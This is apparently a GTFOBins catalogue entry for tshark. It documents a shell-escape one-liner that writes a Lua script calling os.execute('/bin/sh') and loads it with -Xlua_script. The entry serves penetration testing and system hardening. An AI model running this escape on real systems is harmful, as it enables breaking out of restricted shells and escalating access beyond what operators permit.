GTFOBins.github.io/_gtfobins/tshark.md
2021-06-18 14:12:25 +02:00

213 B

description functions
This program is able to execute [`lua`](/gtfobins/less/) code.
shell
code
TF=$(mktemp) echo 'os.execute("/bin/sh")' >$TF tshark -Xlua_script:$TF